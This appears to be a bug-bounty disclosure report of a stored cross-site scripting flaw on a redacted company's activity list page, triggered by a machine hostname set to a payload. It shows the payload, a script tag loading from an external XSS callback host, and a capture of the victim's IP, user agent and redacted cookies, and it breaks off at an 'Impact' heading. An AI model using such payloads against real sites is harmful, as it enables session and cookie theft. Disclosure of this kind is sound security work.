The page located at https://sal.██████.com/list/Activity/hour/all/0/ suffers from a Cross-site Scripting (XSS) vulnerability when a user has set their hostname on their machine to an XSS payload.

Vulnerable Page

https://sal.██████.com/list/Activity/hour/all/0/

Victim IP Address

███████

Referer

https://sal.██████.com/

User Agent

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36

Cookies (Non-HTTPOnly)

_ga=████████; _mkto_trk=id:███&token:_mch-█████.com-██████; _biz_uid=████████; _biz_nA=2; _biz_flagsA=%7B%22Version%22%3A1%2C%22Mkto%22%3A%221%22%7D; _biz_pendingA=%5B%5D; csrftoken=█████

Source

&gt;<td><a href="/machine_detail/28/">███</a></td><td>██████████</td><td>2020-10-01 06:51 BST</td></tr><tr><td><a href="/machine_detail/17/">███████</a></td><td>██████</td><td>2020-10-01 06:50 BST</td></tr><tr><td><a href="/machine_detail/41/">"&gt;&lt;script src="https://nahamsec.xss.ht"&gt;&lt;/script&gt;</a></td><td>bensdp</td><td>2020-10-01 06:49 BST</td></tr></tbody></table></div></div><div><div><div>██████</div></div><div>

Thanks,
Ben

Impact